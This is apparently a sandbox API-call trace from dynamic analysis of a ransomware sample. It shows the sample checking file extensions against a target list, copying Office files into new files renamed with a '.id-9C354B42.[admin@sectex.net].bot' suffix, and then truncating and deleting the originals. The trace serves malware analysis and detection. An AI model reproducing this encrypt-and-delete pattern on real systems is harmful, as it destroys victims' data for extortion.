	[0148.739] ReadFile (in: hFile=0x3d4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.739] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0148.740] SetEndOfFile (hFile=0x3ac) returned 1
	[0148.740] CloseHandle (hObject=0x3ac) returned 1
	[0148.740] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.740] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.750] CloseHandle (hObject=0x3d4) returned 1
	[0148.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.756] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois.hxs")) returned 1
	[0149.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.044] lstrlenW (lpString=".doc") returned 4
	[0149.044] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.044] lstrlenW (lpString=".docx") returned 5
	[0149.044] lstrcmpiW (lpString1=".docx", lpString2="S.HXS") returned -1
	[0149.044] lstrlenW (lpString=".pdf") returned 4
	[0149.044] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.044] lstrlenW (lpString=".xls") returned 4
	[0149.044] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.044] lstrlenW (lpString=".xlsx") returned 5
	[0149.044] lstrcmpiW (lpString1=".xlsx", lpString2="S.HXS") returned -1
	[0149.044] lstrlenW (lpString=".ppt") returned 4
	[0149.044] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.044] lstrlenW (lpString=".zip") returned 4
	[0149.044] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.044] lstrlenW (lpString=".rar") returned 4
	[0149.044] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.044] lstrlenW (lpString=".bz2") returned 4
	[0149.044] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.044] lstrlenW (lpString=".7z") returned 3
	[0149.045] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.045] lstrlenW (lpString=".dbf") returned 4
	[0149.045] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.045] lstrlenW (lpString=".1cd") returned 4
	[0149.045] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.045] lstrlenW (lpString=".jpg") returned 4
	[0149.045] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.045] lstrlenW (lpString=".doc") returned 4
	[0149.045] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.045] lstrlenW (lpString=".docx") returned 5
	[0149.045] lstrcmpiW (lpString1=".docx", lpString2="S.HXS") returned -1
	[0149.045] lstrlenW (lpString=".pdf") returned 4
	[0149.045] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.045] lstrlenW (lpString=".xls") returned 4
	[0149.045] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.045] lstrlenW (lpString=".xlsx") returned 5
	[0149.045] lstrcmpiW (lpString1=".xlsx", lpString2="S.HXS") returned -1
	[0149.045] lstrlenW (lpString=".ppt") returned 4
	[0149.045] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.045] lstrlenW (lpString=".zip") returned 4
	[0149.045] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.045] lstrlenW (lpString=".rar") returned 4
	[0149.045] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.045] lstrlenW (lpString=".bz2") returned 4
	[0149.045] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.046] lstrlenW (lpString=".7z") returned 3
	[0149.046] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.046] lstrlenW (lpString=".dbf") returned 4
	[0149.046] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.046] lstrlenW (lpString=".1cd") returned 4
	[0149.046] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS") returned 55
	[0149.046] lstrlenW (lpString=".jpg") returned 4
	[0149.046] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.046] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0149.046] lstrlenW (lpString="ORGCH.VRD") returned 9
	[0149.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgch.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.466] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1608) returned 1
	[0149.466] CloseHandle (hObject=0x3f4) returned 1
	[0149.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgch.vrd")) returned 0x20
	[0149.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgch.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgch.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.524] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.524] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgch.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.526] GetLastError () returned 0x0
	[0149.526] ReadFile (in: hFile=0x3ec, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x648, lpOverlapped=0x0) returned 1
	[0149.615] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x650, lpOverlapped=0x0) returned 1
	[0149.616] ReadFile (in: hFile=0x3ec, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.616] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0149.616] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.629] CloseHandle (hObject=0x3ac) returned 1
	[0149.629] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.629] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.631] CloseHandle (hObject=0x3ec) returned 1
	[0149.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.678] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgch.vrd")) returned 1
	[0149.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.781] lstrlenW (lpString=".doc") returned 4
	[0149.781] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0149.788] lstrlenW (lpString=".docx") returned 5
	[0149.791] lstrcmpiW (lpString1=".docx", lpString2="H.VRD") returned -1
	[0149.791] lstrlenW (lpString=".pdf") returned 4
	[0149.794] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0149.794] lstrlenW (lpString=".xls") returned 4
	[0149.797] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0149.797] lstrlenW (lpString=".xlsx") returned 5
	[0149.797] lstrcmpiW (lpString1=".xlsx", lpString2="H.VRD") returned -1
	[0149.797] lstrlenW (lpString=".ppt") returned 4
	[0149.797] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0149.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.797] lstrlenW (lpString=".zip") returned 4
	[0149.797] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0149.797] lstrlenW (lpString=".rar") returned 4
	[0149.797] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0149.797] lstrlenW (lpString=".bz2") returned 4
	[0149.797] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0149.797] lstrlenW (lpString=".7z") returned 3
	[0149.797] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0149.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.797] lstrlenW (lpString=".dbf") returned 4
	[0149.797] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0149.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.798] lstrlenW (lpString=".1cd") returned 4
	[0149.798] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0149.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.798] lstrlenW (lpString=".jpg") returned 4
	[0149.798] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0149.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.798] lstrlenW (lpString=".doc") returned 4
	[0149.798] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0149.798] lstrlenW (lpString=".docx") returned 5
	[0149.798] lstrcmpiW (lpString1=".docx", lpString2="H.VRD") returned -1
	[0149.798] lstrlenW (lpString=".pdf") returned 4
	[0149.798] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0149.798] lstrlenW (lpString=".xls") returned 4
	[0149.798] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0149.798] lstrlenW (lpString=".xlsx") returned 5
	[0149.798] lstrcmpiW (lpString1=".xlsx", lpString2="H.VRD") returned -1
	[0149.798] lstrlenW (lpString=".ppt") returned 4
	[0149.798] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0149.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.798] lstrlenW (lpString=".zip") returned 4
	[0149.798] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0149.799] lstrlenW (lpString=".rar") returned 4
	[0149.799] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0149.799] lstrlenW (lpString=".bz2") returned 4
	[0149.799] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0149.799] lstrlenW (lpString=".7z") returned 3
	[0149.799] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0149.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.799] lstrlenW (lpString=".dbf") returned 4
	[0149.799] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0149.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.799] lstrlenW (lpString=".1cd") returned 4
	[0149.799] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0149.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGCH.VRD") returned 57
	[0149.799] lstrlenW (lpString=".jpg") returned 4
	[0149.799] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0149.799] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0149.799] lstrlenW (lpString="PIPELINE.VRD") returned 12
	[0149.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pipeline.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0149.806] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1920) returned 1
	[0149.806] CloseHandle (hObject=0x3b4) returned 1
	[0149.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pipeline.vrd")) returned 0x20
	[0149.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pipeline.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pipeline.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.987] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.987] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pipeline.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.119] GetLastError () returned 0x0
	[0150.119] ReadFile (in: hFile=0x3ac, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x780, lpOverlapped=0x0) returned 1
	[0150.120] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x790, lpOverlapped=0x0) returned 1
	[0150.121] ReadFile (in: hFile=0x3ac, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.121] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.122] SetEndOfFile (hFile=0x3f0) returned 1
	[0150.122] CloseHandle (hObject=0x3f0) returned 1
	[0150.122] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.122] SetEndOfFile (hFile=0x3ac) returned 1
	[0150.124] CloseHandle (hObject=0x3ac) returned 1
	[0150.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.138] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pipeline.vrd")) returned 1
	[0150.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.187] lstrlenW (lpString=".doc") returned 4
	[0150.187] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0150.187] lstrlenW (lpString=".docx") returned 5
	[0150.188] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0150.188] lstrlenW (lpString=".pdf") returned 4
	[0150.188] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0150.188] lstrlenW (lpString=".xls") returned 4
	[0150.188] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0150.188] lstrlenW (lpString=".xlsx") returned 5
	[0150.188] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0150.188] lstrlenW (lpString=".ppt") returned 4
	[0150.188] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0150.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.188] lstrlenW (lpString=".zip") returned 4
	[0150.188] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0150.188] lstrlenW (lpString=".rar") returned 4
	[0150.188] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0150.188] lstrlenW (lpString=".bz2") returned 4
	[0150.188] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0150.188] lstrlenW (lpString=".7z") returned 3
	[0150.188] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0150.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.188] lstrlenW (lpString=".dbf") returned 4
	[0150.188] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0150.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.188] lstrlenW (lpString=".1cd") returned 4
	[0150.188] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0150.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.188] lstrlenW (lpString=".jpg") returned 4
	[0150.188] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.189] lstrlenW (lpString=".doc") returned 4
	[0150.189] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString=".docx") returned 5
	[0150.189] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0150.189] lstrlenW (lpString=".pdf") returned 4
	[0150.189] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString=".xls") returned 4
	[0150.189] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0150.189] lstrlenW (lpString=".xlsx") returned 5
	[0150.189] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0150.189] lstrlenW (lpString=".ppt") returned 4
	[0150.189] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.189] lstrlenW (lpString=".zip") returned 4
	[0150.189] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0150.189] lstrlenW (lpString=".rar") returned 4
	[0150.189] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString=".bz2") returned 4
	[0150.189] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString=".7z") returned 3
	[0150.189] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0150.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.189] lstrlenW (lpString=".dbf") returned 4
	[0150.189] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.189] lstrlenW (lpString=".1cd") returned 4
	[0150.189] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0150.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD") returned 60
	[0150.190] lstrlenW (lpString=".jpg") returned 4
	[0150.190] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0150.190] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0150.190] lstrlenW (lpString="SAVASWEB.VSL") returned 12
	[0150.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\savasweb.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0150.245] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=48488) returned 1
	[0150.245] CloseHandle (hObject=0x3f8) returned 1
	[0150.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\savasweb.vsl")) returned 0x20
	[0150.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\savasweb.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\savasweb.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0150.245] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.245] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\savasweb.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0150.246] GetLastError () returned 0x0
	[0150.246] ReadFile (in: hFile=0x3f8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbd68, lpOverlapped=0x0) returned 1
	[0150.256] WriteFile (in: hFile=0x3fc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbd70, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbd70, lpOverlapped=0x0) returned 1
	[0150.258] ReadFile (in: hFile=0x3f8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.258] WriteFile (in: hFile=0x3fc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.258] SetEndOfFile (hFile=0x3fc) returned 1
	[0150.258] CloseHandle (hObject=0x3fc) returned 1
	[0150.258] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.258] SetEndOfFile (hFile=0x3f8) returned 1
	[0150.261] CloseHandle (hObject=0x3f8) returned 1
